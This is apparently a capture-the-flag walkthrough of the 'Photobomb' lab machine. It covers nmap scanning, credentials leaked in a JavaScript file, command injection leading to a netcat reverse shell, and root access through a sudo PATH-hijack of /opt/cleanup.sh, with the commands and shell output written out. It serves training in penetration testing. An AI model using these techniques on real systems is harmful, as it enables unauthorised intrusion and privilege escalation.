Enumeration
Nmap
1
nmap -sV -sC <target ip>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 10:47 EST
Nmap scan report for 10.10.11.182
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds
Letβs see port 80
and by inspecting and by looking into source code of the page we found photobomb.js
Letβs see whatβs there in the photobomb.js
we got the special url that is http://pH0t0:b0Mb!@photobomb.htb/printer
now we logged in as pH0t0
we can see that we can download the images! letβs intercept that using burpsuite!
By looking at the intercepted request we can see that we can we can take leverage of injection functionality here!
try with the reverse shell ! visit here to generate reverseshell https://revshells.com/
Itβs importent to encode the payload to urlencode
Β Β
we got a reverse shell!
1
2
3
4
5
6
7
8
9
10
β― sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.182
wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
wizard@photobomb:~/photobomb$ hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a
wizard@photobomb:~/photobomb$ cat ../user.txt
c00**************************1d8
wizard@photobomb:~/photobomb$
Privilege Escalation
By looking at the sudoers we can see that we can run a script, but we also have the ability to set environment variables
1
2
3
4
5
6
7
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
secure_path=/usr/local/bin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$
Looking at the script we can see that it uses find relatively and not the absolute path
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
wizard@photobomb:~$
We can take advantage of the fact that we can change variables like the path so that it takes us a custom find command, and in the context of sudo our find will run as root
Congragulations!
this is the command that gives you the root privileges sudo PATH=$PWD:$PATH /opt/cleanup.sh
1
2
3
4
5
6
7
8
wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:~# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:~# hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a
root@photobomb:~# cat /root/root.txt
344**************************a18
root@photobomb:~#